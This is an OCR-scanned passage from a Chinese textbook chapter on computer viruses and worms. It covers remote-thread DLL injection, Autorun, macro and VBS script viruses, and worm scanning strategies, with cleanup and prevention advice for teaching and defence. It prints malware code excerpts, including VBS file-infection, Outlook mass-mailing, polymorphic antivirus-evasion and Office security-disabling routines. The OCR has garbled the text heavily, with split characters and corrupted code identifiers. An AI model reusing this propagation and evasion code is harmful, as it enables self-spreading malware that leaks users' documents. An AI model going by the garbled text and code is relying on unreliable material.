(3) 动态 嵌入 式 。 动 态 嵌入 式 的 主要 方式 是 利用 挂 接 API、 全 局 钩子 ([HOOK)、 远 程 
线程 。 

使 用 挂钩 (Hook) 插 入 DLL 是 通过 系统 的 挂 钧 机 制 来 插入 进程 , 需要 调用 
SetWindowsHookEx 函数 (也 是 一 个 Win32 API 函数 )。 缺 点 是 技术 门槛 较 高 ,程序 调试 
困难 。 

远程 线程 技术 指 的 是 通过 在 一 个 进程 中 创建 远程 线程 的 方法 来 进入 那个 进程 的 内 存 地 
址 空间 。 关 键 API 有 : 

。 OpenProcess: 用 于 打开 要 寄生 的 目标 进程 

。 VirtualAllocEx/VirtualFreeEx: 用 于 在 目标 进程 中 分 配 / 释 放 内 存 空 间 ; 

。 WriteProcessMemory: 用 于 在 目标 进程 中 写 和 要 加 载 的 DLL 名 称 ; 

。 CreateRemoteThread: 远程 加 载 DLL 的 核心 内 容 , 用 于 控制 目标 进程 调用 API 函数 ; 

。 LoadLibrary: 目标 进程 通过 调用 此 函数 来 加 载 病毒 DLL。 

3) 三 线程 病毒 

2002 年 6 月 6 日 ,“ 中 国 黑客 "病毒 出 现 , 它 发 明了 全 球 首创 的 “三 线程 "技术 。 该 病毒 仅 针 
对 Windows 2000/XP 操作 系统 ,此 病毒 命名 为 Win32. Runouce. 6703 ,是 一 例 感 染 型 蠕虫 ,可 感 
染 Windows 的 PE 可 执行 文件 。 它 以 邮件 的 形式 进行 传播 ,并 且 可 以 感染 文件 。 该 病毒 使 用 
了 全 球 首创 的 “三 线程 ”结构 ,整个 病毒 采用 汇编 语言 开发 ,用 了 非常 多 的 反 跟踪 技巧 。 
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三 线程 病毒 包括 两 个 监视 线程 : dll 监视 注册 表 和 监视 主 运行 文件 。 主 程序 负责 插入 
线程 ,创建 备份 文件 ,释放 资源 文件 DLL ,复制 自身 与 系统 目录 。 病 毒 运行 后 ,会 自动 查找 
Windows 系统 目录 ,将 自身 复制 到 \\%System%\\ 目 录 下 取 名 为 RunOnce. exe。 

主线 程 完 成 准备 工作 、 创 建 辅助 线程 和 实现 主 程序 功能 三 个 任务 。 准 备 工作 包括 文件 
复制 和 保存 ,一 般 情况 下 是 把 可 执行 文件 复制 到 系统 目录 下 。 为 了 防止 意外 删除 ,将 可 执行 
文件 备份 ,为 了 隐蔽 修改 文件 属性 。 创 建 辅助 线程 是 创建 驻 留 在 其 他 宿主 进程 体内 的 远程 
线程 ,线程 的 功能 就 是 监视 其 他 进程 或 线程 的 运行 情况 ,如 果 出 现 异 常 立即 恢复 。 

主 进程 体内 的 线程 同时 观察 注册 表 和 远程 进程 的 情况 。 实 时 查询 注册 表 里 HKEY_ 
LOCAL _MACHINE\Software\Microsoft\ Windows\CurrentVersion\Run 键 , 如 果 被 删 则 
添加 ;监视 驻 留 宿主 进程 体内 的 线程 运行 情况 ,防止 辅助 线程 被 关闭 。 

宿主 进程 体内 的 辅助 线程 则 监视 主 进程 的 运行 情况 : 如 果 主 进程 被 关闭 , 先 确认 程序 
的 可 执行 文件 是 否 也 被 删除 掉 了 ;如 果 被 删 , 则 用 备份 的 文件 恢复 可 执行 文件 ,然后 再 重新 
启动 程序 。 

4) 移动 介质 Autorun 病毒 

磁盘 根 目录 下 的 Autorun. inf 是 Windows 操作 系统 自 带 的 一 个 自动 播放 功能 ,病毒 往 
往 利用 这 个 漏洞 在 每 个 盘 符 的 根 目录 下 生成 病毒 文件 并 且 自 动 运 行 。 

autorun. inf 文件 保存 着 一 些 简单 的 命令 ,告知 系统 新 插入 的 光盘 或 U 盘 应 该 自动 启动 
什么 程序 ,实现 Windows 系统 的 一 种 方便 特性 ,使 当 光 盘 、U 盘 插 入 到 机 器 时 自动 运行 。 详 
细 内 容 见 看 雪 论 坛 资 料 http://bbs. pediy. com/index. php。 

常见 的 Autorun. inf 文件 格式 大 致 如 下 : 

。 [AutoRun|] : 表示 AutoRun 部 分 开始 ,必须 输入 ; 
icon 二 C:\C. ico: 指定 给 C 盘 一 个 个 性 化 的 盘 符 图 标 C. ico; 
open 一 C:\X.exe: 指定 要 运行 程序 的 路 径 和 名 称 ,只 要 在 此 放 入 病毒 程序 就 可 自动 
运行 。 

在 注册 表 中 有 允许 和 防止 自动 运行 的 键 值 项 , 键 路 径 是 LHKEY_CURRENT _USER\ 
Software\ Microsoft \ Windows \ CurrentVersion \ Policies \ Exploer ], 在 右 侧 的 键 
NoDriveTypeAutoRun 决定 , 键 值 如 下 : 

DRIVE_UNKNOWN 0 1 01h: 不 能 识别 的 类 型 设备 ; 
DRIVE_NO_ROOT_DIR 1 0 02h: 没有 根 目录 的 驱动 器 ; 
DRIVE_REMOVABLE 2 1 04h: 可 移动 驱动 器 ; 
DRIVE_FIXED 3 0 08h: 固定 的 驱动 器 ; 
DRIVE_REMOTE 4 1 h: 网 络 驱动 器 
DRIVE_CDROM 5 0 20h: 光驱 ; 

DRIVE_RAMDISK 6 0 40h: RAM 磁盘 。 

其 中 ,保留 7180h 未 指定 的 驱动 器 类 型 。 

Autorun 病毒 清除 方法 是 : 修改 注册 表 禁 止 磁盘 的 自动 运行 特性 ;删除 注册 表 中 病毒 
文件 的 注册 ;在 文件 夹 选项 中 选中 显示 所 有 文件 和 文件 夹 ;在 任务 管理 器 中 杀 掉 病毒 进程 ; 
删除 病毒 (一 般 在 Windows 目录 下 ) 和 autorun. inf 文件 ( 根 目 录 下 ); 重 启 系统 。 

Autorun 病毒 免疫 方法 是 : 修改 注册 表 禁 止 Autorun; 新 建 autorun. inf, 并 在 CMD 下 
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输入 attrib 十 s 十 h c:\\autorun. inf 更 改 属性 防 删改 ;在 根 目 录 下 建立 autorun. inf 文件 夹 ， 
或 在 cmd 下 输入 md c:\\autorun. inf\\aa...\\( 防 删除 ) 。 

2. 宏 病 毒 

宏 病 毒 是 使 用 宏 语 言 编写 的 一 种 脚本 病毒 程序 ,可 以 在 一 些 数据 处 理 系统 中 运行 ,存在 
于 字 处 理 文档 ,数据 表格 数据库 和 演示 文档 等 数据 文件 中 ,利用 宏 语言 的 功能 将 自己 复制 
并 且 繁 殖 到 其 他 数据 文档 里 。 

(Macro)“ 宏 ”是 微软 公司 出 品 的 Office 软件 包 中 所 包含 的 一 项 特殊 功能 ,目的 是 减少 
用 户 的 重复 劳动 。 凡 是 有 宏 处 理 的 程序 如 Office 都 可 能 存在 宏 病 毒 ;Macro 可 以 存在 于 模 
板 里 或 正常 Office 文档 里 ;通过 IE 浏览 器 可 以 直接 打开 宏 病 毒 ,而 不 提示 下 载 。 

1) 宏 病 毒 的 工作 机 理 

利用 如 表 2. 1 所 示 的 自动 执行 宏 将 病毒 代码 写 在 宏 中 ,由 于 这 些 宏 在 Office 文档 操作 
中 会 自动 执行 ,因此 获取 控制 权 。 


表 2.1 宏 函 数 表 
Word Excel Office 97/2000 
AutoOpen Auto_Open Document_Open 
AutoClose Auto_Close Document_Close 
AutoExec 
AutoExit 
AutoNew Document_New 
Auto_Activate 
Auto_Deactivate 


当 打 开 有 毒 的 Office 文件 时 ,激活 AutoOpen 宏 ,并 将 病毒 代码 写 入 宿主 文档 所 关联 的 
模板 文件 如 Normal. dot; 当 打开 或 新 建 无 毒 的 Office 文件 时 ,从 带 毒 模板 中 读 入 病毒 宏 并 
运行 ,保存 文件 时 存 入 Office 文件 。 

2) 宏 病 毒 特点 

。 传播 快 。Office 文档 是 交流 最 广 的 文件 类 型 ,给 宏 病 毒 传播 带 来 很 多 便利 。 

。 制作 、 变 种 方便 。 使 用 宏 语 言 WordBasic 编写 宏 指 令 , 用 户 很 方便 就 可 以 看 到 这 种 

宏 病毒 的 全 部 面目 。 把 宏 病 毒 稍 加 修改 就 产生 了 一 种 新 的 宏 病 毒 。 

。 破坏 性 大 。 

。 多 平台 交叉 感染 。 

。 多 通过 网 络 或 邮件 挂 载 带 毒 文档 传播 。 带 毒 文 档 挂 在 网 页 上 , 当 浏览 者 单 击 该 连接 

时 ,浏览 器 就 会 将 doc 文档 下 载 并 自动 启动 Word 打开 该 文档 ; 当 文 档 被 打开 时 , 病 
毒 也 就 被 执行 了 。Word 文档 中 还 可 插入 病毒 包 如 X. EXE。 如 图 2. 8 所 示 。 

3) 宏 病 毒 防治 

对 于 宏 病 毒 ,首选 杀毒 软件 查 杀 ;也 可 通过 安全 性 设置 禁止 未 授权 宏 的 执行 ;或 者 先 备 
份 干净 的 Normal. dot 模板 ;在 CMD shell 中 运行 winword. exe/m Disable AutoMacros 命 
令 , 禁 止 自动 宏 。 
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结果 
对象。 
a as 


图 2.8 宏 病 毒 传播 


3. 脚本 病毒 


脚本 病毒 是 使 用 脚本 语言 如 Vbs\Js 等 在 应 用 系统 软件 环境 下 编辑 和 运行 的 ,能 够 进 


行 自我 传播 的 破坏 性 程序 。 


脚本 语言 是 一 种 解释 性 的 语言 ,以 文本 形式 存在 ,例如 Python vbscript、javascript、 
installshield script 和 ActionScript 等 ,不 需要 编译 ,由 相应 的 脚本 引擎 来 解释 执行 。 例 如 
VBScript 代码 是 通过 Windows Script Host 来 解释 执行 的 ,wscript. exe 就 是 该 功能 的 相关 
支持 程序 。 绝 大 部 分 VBS 脚本 病毒 运行 的 时 候 需 要 对 象 FileSystemObject 的 支持 ,通过 网 
页 传播 的 病毒 需要 ActiveX 的 支持 ,通过 E-mail 传播 的 病毒 需要 邮件 软件 的 自动 发 送 功能 


支持 。 
1) 脚本 病毒 特点 


JSE、WSH 和 WSF。 


. 


采用 多 种 欺骗 手段 。 
。 一般 需要 人 工 干 预 触发 执行 。 
2) 脚本 病毒 的 传播 


获取 容易 ,改写 简单 ,变种 多 。 容 易 用 病毒 生产 机 实现 。 

感染 力 强 。 可 以 实现 多 种 复杂 操作 感染 其 他 文件 或 直接 自动 运行 。 

传播 速度 快 。 可 以 寄生 于 HTML 或 邮件 通过 网 络 传播 ,其 传播 速度 非常 快 。 

破坏 力 强 。 不 但 能 够 攻击 被 感染 的 主机 ,获取 敏感 信息 ,删除 关键 文件 ;还 可 以 攻击 
网 络 或 者 服务 器 ,造成 拒绝 服务 攻击 ,产生 严重 破坏 。 


脚本 病毒 使 用 脚本 语言 编写 ,源码 可 读 性 强 。 文 件 后 级 名 可 能 为 VBS、VBE、JS、 


VBS 脚本 病毒 是 直接 通过 自我 复制 来 感染 文件 的 ,病毒 中 的 绝 大 部 分 代码 都 可 以 直接 


附加 在 其 他 同类 程序 的 中 间 。 


网 络 传播 方式 有 : 通过 电子 邮件 .局 域 网 共享 传播 ,感染 HTML、ASP、JSP、PHP 等 网 


页 通过 浏览 器 传播 ,通过 U 盘 自动 运行 传播 等 。 
3) 触发 方式 一 一 获得 控制 权 


。 修改 注册 表 项 ,直接 调用 wsh. RegWrite(strName,anyvalue [ ,strType])。 
。 通过 映射 文件 执行 方式 。 如 将 dll 的 执行 方式 修改 为 wscript. exe 或 病毒 代码 。 


。 欺骗 用 户 , 让 用 户 自己 点 击 执行 。 如 采用 双 后 级 的 文件 名 ,由 于 默认 情况 下 后 级 并 


不 显示 ,文件 名 为 beauty. jpg. vbs 将 显示 一 张 图 片 标示 。 


。 desktop. ini 和 folder. htt 互相 配合 ,如 果 用 户 进入 含有 这 两 个 文件 的 目录 时 就 会 触 


发 folder. htt 中 的 病毒 代码 。 
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。 直接 复制 和 调用 可 执行 文件 。 
4) 预防 和 解除 vbs 脚本 病毒 
一 般 措 施 为 禁用 文件 系统 对 象 FileSystemObject; 外 载 Windows Scripting Host; 删除 


VBS、VBE、JS、JSE 文件 后 缀 名 与 应 用 程序 的 映射 (在 文件 夹 选 项 的 文件 类 型 ); WScript. 
exe 改名 或 者 删除 ;禁用 浏览 器 "ActiveX 控件 及 插件 ”; 禁 止 OE 的 自动 收发 邮件 功能 ;显示 
所 有 文件 类 型 的 扩展 名 称 ; 网 络 安全 级 别 设置 至 少 为 “中 等 ”, 禁 用 部 分 Activex; 使 用 杀毒 软 
件 查 杀 。 


5) VBS 脚本 病毒 举例 一 一 新 欢乐 时 光 病毒 
新 欢乐 时 光 病毒 可 以 将 自己 的 代码 附加 在 . htm 文件 的 尾部 ,并 在 顶部 加 入 一 条 调用 病 


毒 代 码 的 语句 。 而 宏 病 毒 则 是 直接 生成 一 个 文件 的 副本 ,将 病毒 代码 复制 到 其 中 ,并 以 原文 
件 名 作为 病毒 文件 名 的 前 级 ,vbs 作为 后 级 。 


新 欢乐 时 光 病 毒 文件 感染 的 部 分 关键 代码 如 下 : 


Set fso= createcbject ("scripting.filesystemobject") // 创 建 一 个 文件 系统 对 象 
set self=fso.opentextfile(wscript.scriptfullname,1) ”// 读 打开 当前 文件 ( 即 病毒 本 身 ) 


vbscopy= self.readall // 读 取 病 毒 全 部 代码 到 字符 串 变 量 vbscopy 
set ap= fso.opentextfile( 目 标 文件 .path,2,true) // 写 打开 目标 文件 ,准备 写 入 病毒 代码 
ap.write vbscopy // 将 病毒 代码 覆盖 目标 文件 

ap.close 

set cop=fso.getfile( 目 标 文件 .path) // 得 到 目标 文件 路 径 

cop.copy( 目 标 文件 .path & ".vbs") // 创 建 另 外 一 个 病毒 文件 (以 .vbs 为 后 级 ) 


// 目 标 文件 .delete (true) 删 除 目标 文件 
新 欢乐 时 光 病 毒 搜 索 OUTLOOK 用 户 E-mail 地 址 代码 如 下 : 


Function mailBroadcast () 


on error resume next // 出 错 立 即 返回 , 隐 项 行踪 
Wscript.echo 

Set outlookApp= CreateObject ("outlook.Application") // 创 建 一 个 OUTLOOK 应 用 的 对 象 
If outlookApp= "Outlook" Then 

Set mapiobj= outlookRpp.GetNameSpace ("MAPI") // 获 取 MAPI 的 名 字 空 间 

Set addrList=mapiobj .AddressLists // 获 取 地 址 表 的 个 数 


For Each addr In addrList 
If addr.AddressEntries.Count < > 0 Then 


agdrEntCount=addr.AddressEntries.Count // 获 取 每 个 地 址 表 的 E-mail 记录 
For addrEntIndex=1 To addrEntCount // 遍 历 地 址 表 的 E-mail 地 址 
Set item= outlookApp.CreateItem(0) // 获 取 一 个 邮件 对 象 实例 
Set addrEnt=addr.AddressEntries (addrEnt Index) // 获 取 具 体 E-mail 
item.To=addrEnt .Address // 填 入 收 信人 地 址 
item.Subject= "病毒 传播 实验 " // 写 人 邮件 标题 

item.Body= "这 里 是 病毒 邮件 传播 测试 , 收 到 此 信 请 不 要 慌张 !"” // 写 入 文件 

Set attachMents= item.Rttachments // 定 义 邮 件 附件 
attachMents.Add fileSysObj .GetSpecialFolder (0) &"test .jpg.vbs" 
item.DeleteAfterSubmit=True // 信 件 提交 后 自动 删除 

If item.To < > "" Then 

item.Send // 发 送 邮 件 


shell0b]j .regwrite "HKCUsoftwareMailtestmailed", "1" // 标 记 病毒 以 免 重 复 感染 


End If 

NextEnd IfNext 
End if 

End Function 


新 欢乐 时 光 病 毒 感染 htm、asp\jsp 和 php 等 网 页 文件 的 关键 代码 如 下 : 


// 对 coM 进 行 初始 化 ,正确 地 使 用 FSo 和 WSH 这 两 个 对 象 

Set Apple0bj ect= document .applets ("KJ guest") 

AppleObject .setCLSID ("{F935DC22- 1CF0- 11D0- RDB9- 00C04FD58ROB}m) 
// 参 数 为 Windows Script Host Shell Object 对 象 ,规避 查 杀 
Rppleobject.createInstance () // 创 建 一 个 实例 

Set Wsshell AppleObject.GetObject () 

AppleObject .setCLSID("{0D43FE01- F093- 11CE— 8940- 00A0C9054228}") 
// 参 数 为 本 lesystem Object 对 象 ,规避 查 杀 

AppleObject .createInstance() // 创 建 一 个 实例 

Set FSO=AppleObject .GetObject () 


新 欢乐 时 光 病 毒 自 加 密 多 态 代码 变形 技术 的 关键 代码 如 下 : 


// 创 建文 件 系 统 对 象 , 且 变 形 规避 查 杀 scripting.filesystemobject 
Set Of=CreateObject ("Script"+ "ing.FileSyste"+ "mobject") 
VvC=0f .OpenTextFile (WScript.ScriptFullName,1) .Readall ”// 读 取 自 身 代 码 
fs=Array ("Of", "vC", "fS", "fsSC") // 定 义 一 个 即将 被 替换 字符 的 数组 
For fSC=0To 3 
VC=Replace (vC,， fS (fSCc)，Chr((Int (Rnd * 22)+65)) 
& Chr((Int(Rnd * 22)+65)) &Chr((Int(Rnd * 22)+65)) 
& Chr((Int (Rnd * 22)+65))) // 取 4 个 随机 字符 替换 数组 fs 中 的 字符 串 
Next // 然 后 将 替换 后 的 代码 写 回 文件 
Of.OpenTextFile (WScript.ScriptFullName，2，1) .Writeline VC 


6) VBS 脚本 病毒 举例 一 一 叛逃 者 病毒 

2003 年 2 月 ,国内 发 现 一 个 混合 型 脚本 病毒 一 一 “叛逃 者 (VBS. Evade) ”病毒 。 该 病毒 
不 但 感染 脚本 文件 ,Excel 和 Word 文档 ,而 且 还 会 直接 覆盖 一 部 分 音乐 视频 及 工作 文档 。 
还 会 通过 Outlook 发 送 已 感染 Office 文档 的 E-mail, 造 成 用 户 重要 信息 泄露 。 

叛逃 者 病毒 感染 后 修改 注册 表 , 添 加 文件 Netlnk32. vbs、Conversation. vbe、 Winstart. 
vbs、Wininst32. vbs、Winnt32. vbs、Winnet32. vbs, 在 根 目录 建立 文件 Passwords. vbs ,在 系 
统 目 录 添 加 文件 evade. gif、evade. jpg， 修改 文件 personal. xls 和 Script, ini, 感 染 . vbs、. vbe 
类 型 文件 ,覆盖 数据 文件 ,包括 . mp3、 mp2、. avi、. mpg、. mpeg、. mpe、. mov,. pdf、 doc、 
. xls、. mdb、. ppt 和 .pps 等 13 种 。 

感染 时 先 查 看 . vbs、. vbe 文件 中 是 否 含有 病毒 标记 //VBS/EvadebyZed/[LrRI{], 如 果 
存在 则 不 对 其 进行 感染 。 否 则 ,将 病毒 代码 转换 成 十 六 进 制 Ascii 码 后 写 在 原来 文件 的 末 
尾 ,并 写 人 逆向 转换 代码 和 调用 执行 语句 ;复制 病毒 文件 到 用 户 Windows 目录 和 系统 目录 ; 
修改 注册 表 , 改变 Excel 的 安全 级 别 ; 写 病毒 代码 到 Evade. gif, 并 将 Evade. gif 导入 到 
Personal. xls 文件 ;修改 注册 表 , 改 变 Word 的 安全 级 别 ; 写 病毒 代码 到 Evade. jpg, 并 将 该 
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文件 导入 到 Word 通用 模板 ;搜索 整个 磁盘 ,在 每 个 盘 符 (C 盘 除外 ) 根 目录 下 创建 病毒 副本 
Passwords. vbs; 感 染 硬盘 上 所 有 其 他 . vbs、. vbe 文件 ;对 指定 9 个 目录 进行 再 次 搜索 ,用 病 
毒 文件 覆盖 满足 条 件 ( 指 定 13 种 后 级) 的 文件 ;如 存在 Mirc, 修 改 Script. ini, 使 其 可 以 通过 
Mirc 聊天 通道 发 送 病毒 文件 Conversation. vbe; 修 改 注册 表 , 标 明 病 毒 作者 信息 及 版 本 。 

叛逃 者 病毒 的 技术 特点 : 

。 关键 字 串 加 密 ,解密 一 处 ,执行 一 处 。 

。 脚本 与 宏 病 毒 双重 特性 。 

。 传播 手段 多 样 化 ,文件 感染 、E-mail 传播 、IRC 通道 传播 .各 种 点 对 点 共享 工具 

(KaZza、Edonkey 等 ) 传 播 ; 宏 病 毒 可 以 通过 模板 和 文档 传播 。 

。 覆盖 是 不 可 道 的 ,代码 破坏 性 极 大 。 

。 泄露 用 户 资料 ,自动 通过 E-mail 到 处 发 送 用 户 的 Office 文档 。 

叛逃 者 病毒 的 evade. jpg 文件 屏蔽 技术 代码 如 下 : 


Application.DisplaystatusBar=0 // 不 显示 状态 栏 , 以 免 暴 露 病毒 的 运行 情况 
Application.ScreenUpdating=0 // 不 让 屏幕 刷新 ,以 免 影响 计算 机 执行 速度 
Application.EnableCcancelKey=wdcancelDisabled // 使 不 可 以 通过 Esc 键 取消 正在 执行 的 宏 
Application.DisplayAlerts=wdAlertsNone // 不 让 Excel 弹出 报警 信息 


// 屏 项 工具 菜单 中 的 “ 宏 ”“ 自 定义 ” 
CommandBars ("Tools") .Controls ("Macro") .Enabled=0 
CommandBars ("Tools") .Controls ("Customize…") .Enabled=0 

// 屏 项 宏 菜单 的 “ 宏 "“ 安 全 性 ” 
CommandBars ("Macro") .Controls ("Macros…") .Enabled= 0 
CommandBars ("Macro") .Controls ("Security…") .Enabled=0 

// 屏 项 视图 菜单 的 “工具 栏 ” 
CommandBars ("View") .Controls ("Toolbars") .Enabled=0 

// 屏 项 格式 菜单 的 “对 象 ” 
CommandBars ("format") .Controls ("Object…") .Enabled= 0 


叛逃 者 病毒 evade. gif 文件 的 自动 邮件 代码 如 下 : 


EmailKey= "HKEY_ CURRENT USER\Software\Zed/ [rR1f]\VBS/Evade\RecordContacts\" 
ReadIfSent=wsc.RegRead (EmailKey&ContactSwitch.AddressEntries (UserGroup)) 
// 从 注册 表 中 读 取 信息 ,看 是 否 已 向 该 邮件 地 址 发 送 过 

If ReadIfSent< > "Filesent" Then // 如 果 没 有 发 送 过 , 则 继续 

SetOutlookEmail= Outlookapp.CreateItem(0) 

OutlookEmail .Recipients.Addcontactswitch.AddressEntries (UserGroup) // 收 件 人 
OutlookEmail.Subject=L6 // 邮 件 标题 ,该 标题 是 从 7 个 标题 中 随机 选取 的 
OutlookEmail .Body= "The sending file is confidential." // 邮 件 内 容 
OutlookEmail .Attachments .AGdActiveWorkbook.FullName 

// 邮 件 附件 ,这 里 贴 上 的 是 染 毒 的 office 文 档 ,因此 会 造成 文件 泄露 


OutlookEmail. Importance=2 // 文 件 重要 等 级 
OutlookEmail .DeleteAftersubmit=True // 发 送 后 自我 删除 
OutlookEmail.Send // 发 送 邮件 
Wsc.RegWriteEmailKey&ContactSwitch.AddressEntries (UserGroup),"FileSent" 
// 在 注册 表 中 记录 ,以 免 重复 发 送 

EndIf 


第 2 章 胰 呈 ES 划 


4. 网 页 病毒 
网 页 病毒 主要 是 指 在 网 页 文件 中 用 于 非法 修改 用 户 机 器 配置 的 恶意 脚本 代码 ,严格 意 
义 上 讲 不 属于 病毒 。 主 要 包括 : 
在 用 户 正 浏览 器 的 标题 栏 打 广 告 。 
修改 IE 的 默认 网 址 ,并 且 不 可 以 修改 。 
锁定 用 户 的 注册 表 编 辑 程序 。 
禁止 使 用 “运行 ”选项 。 
有 时 候 也 可 能 对 硬盘 进行 格式 化 ,在 用 户 机 器 上 创建 一 些 文件 。 
各 种 网 页 病毒 还 进行 挂 载 木马 、 伪 装 欺骗 的 行为 ,危害 较 大 ,难以 防范 。 


2.3 网 络 蠕 贝 


网 络 蠕虫 (Worm) 是 一 种 利用 漏洞 通过 网 络 传播 的 恶意 病毒 。 它 是 一 种 智能 化 、 自 动 
化 并 综合 网 络 攻 击 ,密码 学 和 计算 机 病毒 技术 ,不 要 用 户 干 预 即 可 运行 的 攻击 程序 或 恶意 代 
码 。 它 会 自动 扫描 和 攻击 网 络 上 存在 系统 漏洞 的 节点 主机 ,通过 网 络 从 一 个 节点 传播 到 另 
外 一 个 节点 。 重 大 漏洞 将 导致 重大 蠕虫 的 出 现 和 快速 传播 ,2000 年 以 来 的 重大 蠕虫 病毒 有 
爱 虫 .红色 代码 .求职 信 、 冲 击 波 (Blaster) .霸王 虫 (Sobig. F)、 震 荡 波 (Sasser) 和 极速 波 
(Zotob) 等 ,分 别 造成 几 十 其 至 几 百 亿美 元 的 损失 。 


2.3.1 蠕虫 程序 的 功能 结构 


一 个 蠕虫 程序 的 基本 功能 包括 传播 模块 .隐藏 模块 和 目的 模块 3 部 分 。 

(1) 传播 模块 。 传 播 模块 由 扫描 模块 攻击 模块 和 复制 模块 组 成 。 扫 描 模 块 负责 探测 
存在 漏洞 的 主机 。 当 程序 向 某 个 主机 发 送 探 测 漏洞 的 信息 并 收 到 成 功 的 反馈 信息 后 ,就 会 
得 到 一 个 可 传播 的 对 象 。 攻 击 模 块 按照 漏洞 攻击 步 又 自动 攻击 已 经 找到 的 攻击 对 象 ,获得 
一 个 shell( 如 Windows 的 command 窗口 ) ,于 是 拥有 了 对 整个 系统 的 控制 权 。 复 制 模块 通 
过 原 主机 和 新 主机 的 交互 将 蠕虫 程序 复制 到 新 主机 并 启动 ,实际 上 是 一 个 文件 传输 过 程 。 

(2) 隐藏 模块 。 侵 入 主机 后 ,隐藏 蠕虫 程序 ,防止 被 用 户 发 现 。 

(3) 目的 模块 。 实 现 对 计算 机 的 控制 ,监视 或 破坏 等 功能 。 

2003 年 中 国教 育 和 科研 计算 机 网 紧急 响应 组 CCERT 对 蠕虫 的 功能 结构 模型 定义 如 
图 2.9 所 示 。 


蠕虫 程序 功能 模型 


基本 功能 模块 扩展 功能 模块 
| 
搜 | | 攻 | | 传 | | 信 | | 繁 | | 通 | | 隐 | | 破 | | 控 
索 | | 击 | | 输 | | 县 | | 将 让 | | 藏 | | 坏 | | 制 
模 | | 模 | | 模 | | 搜 | 模 模 | | 模 | | 模 | | 模 
块 | | 块 | | 块 发 块 | | 块 | | 块 | | 块 | | 块 
块 


图 2.9 CCERT 定义 的 蠕虫 程序 功能 模型 
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2.3.2 蠕虫 程序 的 工作 机 制 


蠕虫 程序 的 工作 机 制 包括 自动 传播 .自我 隐藏 和 监控 目标 机 器 3 部 分 。 

1. 自动 传播 

自动 传播 包括 扫描 网 络 .攻击 和 复制 3 个 步骤 。 

扫描 网 络 是 收集 网 络 中 存活 的 主机 信息 ,探测 并 分 析 发 现 的 主机 漏洞 ,确定 该 主机 是 否 
能 成 为 一 个 攻击 目标 。 

攻击 就 是 按照 扫描 结果 对 目标 主机 进行 漏洞 攻击 ,取得 该 主机 的 控制 权限 (一 般 为 管理 
员 权 限 ) ,获得 一 个 shell。 

复制 是 通过 原 主机 和 新 主机 的 交互 将 蠕虫 程序 复制 到 新 主机 并 启动 ,完成 蠕虫 的 自动 
传播 。 

2. 自我 隐藏 

当 蠕 虫 攻击 成 功 后 ,为 了 不 被 发 现 , 就 要 采用 一 些 反 检查 技术 ,尽量 隐藏 自己 。 需 要 对 
被 攻击 的 主机 进行 一 些 现场 处 理工 作 , 将 攻击 代码 隐藏 。 为 了 能 使 被 攻击 主机 运行 蠕虫 代 
码 , 还 要 通过 注册 表 将 蠕虫 程序 设 为 自 启动 状态 。 蠕 虫 的 隐藏 手法 有 下 面 几 种 : 

(1) 修改 蠕虫 在 系统 中 的 进程 号 和 进程 名 称 ,掩盖 蠕虫 启动 的 时 间 记 录 。 在 Windows 
NT/2000 下 ,在 psapi. dll 的 EnumProcess API 上 设置 “ 钧 子 ”, 建 立 一 个 虚 的 进程 查看 
函数 。 

(2) 将 蠕虫 复制 到 一 个 目录 下 ,并 更 换文 件 名 为 已 经 运行 的 服务 名 称 , 使 任务 管理 器 不 
能 终止 蠕虫 运行 (隐藏 进程 ) 。 

(3) 删除 自己 。 在 注册 表 中 写 一 条 HKLM\SoftWare\MOROSOFT \WNDOWS\ 
CurrentVetsion\ RUNONCE% COMSPEC%/C DEL 二 PATH_TO_WORMA WORM _ 
FILE_NAME. EXE, 然 后 重新 启动 操作 系统 ,启动 时 删除 自己 。 

3. 监控 目标 机 器 

蠕虫 程序 启动 后 可 以 完成 它 想 完成 的 任何 动作 ,如 恶意 占用 CPU 资源 ,收集 被 攻击 主 
机 的 敏感 信息 、 删 除 关键 文件 .开启 后 门 渗透 攻击 网 络 上 其 他 主机 等 ,可 以 危害 被 感染 的 
主机 。 


2.3.3 蠕虫 的 扫描 机 制 与 策略 


蠕虫 扫描 的 目标 是 尽快 发 现 网 络 中 感染 的 目标 主机 。 

1. 蠕虫 扫描 机 制 

蠕虫 扫描 机 制 包 括 随机 扫描 、 选 择 扫描 和 顺序 扫描 。 

(1) 随机 扫描 。 随 机 扫描 是 随机 选取 某 一 段 IP 地 址 ,然后 对 这 一 地 址 段 上 的 主机 扫 
描 。 由 于 不 知道 哪些 主机 已 经 感染 蠕虫 ,很 多 扫描 是 无 用 的 。 这 一 机 制 使 蠕虫 传播 速度 较 
慢 , 且 随 着 蠕虫 的 扩散 ,大 量 的 网 络 蠕虫 造成 巨大 的 网 络 流量 。 

(2) 选择 扫描 。 选 择 扫描 是 选择 性 地 将 最 有 可 能 存在 漏洞 主机 的 地 址 集 作为 随机 扫描 
的 地 址 空间 。 所 选 的 目标 地 址 按照 一 定 的 算法 随机 生成 ,算法 简单 容易 实现 , 若 与 本 地 优 
先 原 则 结合 则 能 达到 更 好 的 传播 效果 。 红 色 代 码 和 Slammer 的 传播 采用 了 选择 性 随机 扫 
描 机 制 。 
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(3) 顺序 扫描 。 顺 序 扫描 是 被 感染 主机 上 蠕虫 会 随机 选择 一 个 C 类 网 络 地 址 进行 传 
播 ,根据 本 地 优先 原则 ,网 络 地 址 段 顺序 递增 。 

2. 蠕虫 扫描 策略 

扫描 策略 包括 基于 目标 列表 的 扫描 和 基于 DNS 的 扫描 。 

基于 目标 列表 的 扫描 是 指 网 络 蠕虫 根据 预先 生成 易 感染 的 目标 列表 搜寻 感染 目标 。 

基于 DNS 扫描 是 从 DNS 服务 器 获取 IP 地 址 来 建立 目标 地 址 库 , 优 点 在 于 获得 的 IP 
地 址 块 针 对 性 强 和 可 用 性 高 。 关 键 问题 是 如 何 从 DNS 服务 器 得 到 网 络 主机 地 址 ,以 及 
DNS 服务 器 是 否 存 在 足够 的 网 络 主机 地 址 。 

扫描 策略 设计 有 3 个 原则 : 

。 尽量 减少 重复 的 扫描 ,尽量 扫描 没有 被 感染 蠕虫 的 机 器 。 

。 扫描 尽量 覆盖 大 范围 的 可 用 地 址 段 , 扫 描 的 地 址 段 为 互联 网 上 的 有 效 地 址 段 。 

。 处 理 好 扫描 的 时 间 分 布 ,使 得 扫描 不 要 集中 在 某 一 时 间 内 发 生 。 

为 了 尽量 减少 重复 的 扫描 和 扫描 数据 包 的 发 送 ,并 保证 覆盖 尽量 大 的 扫描 范围 ,可 以 改 
进 扫描 策略 如 下 : 

